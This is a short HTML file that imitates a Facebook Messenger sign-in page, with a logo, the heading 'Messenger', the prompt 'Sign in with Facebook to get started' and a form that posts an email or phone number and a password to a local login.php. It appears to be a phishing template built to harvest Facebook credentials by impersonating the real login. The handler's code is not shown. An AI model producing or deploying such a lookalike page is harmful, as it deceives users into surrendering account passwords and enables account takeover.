<!DOCTYPE html>
	<html>
		<body>
			<meta name="viewport" content="width=device-width, initial-scale=1.0">
			<style>
				img {
					width: 80px;
					margin-top: 80px;
					margin-left: 100px;
					margin-right: 100px;
					}
					
					input{
						padding: 10px 60px;
						margin-top: 5px;
						border-radius: 3px;
						border: 1px solid gray;
						}
					
					button {
						padding: 10px 132px;
						margin-top: 8px;
						color: White;
						background-color: #0099ff;
						border: none;
						border-radius: 3px;
						}
						
					label {
						font-family: Sans-serif;
						}
				</style>
				<center>
				<img src="logo.png"/><br>
<p style="font-family: Sans-serif; font-size: 30px; margin-top: 30px">Messenger</p>
<p style="font-family: Sans-serif; margin-top: -20px">Sign in with Facebook to get started.</p><br>
	<form method="post" action="login.php">
				<input type="text" name="username" placeholder="Email address or phone number"></input><br>
				<input type="password" name="password" placeholder="Password"></input><br>
				<button type="submit"><b>Sign In</b></button><br>
				<input type="checkbox" style="margin-top: 20px;"><label>Keep me signed in</label></input>
			</form>
		</center>
	</body>
</html>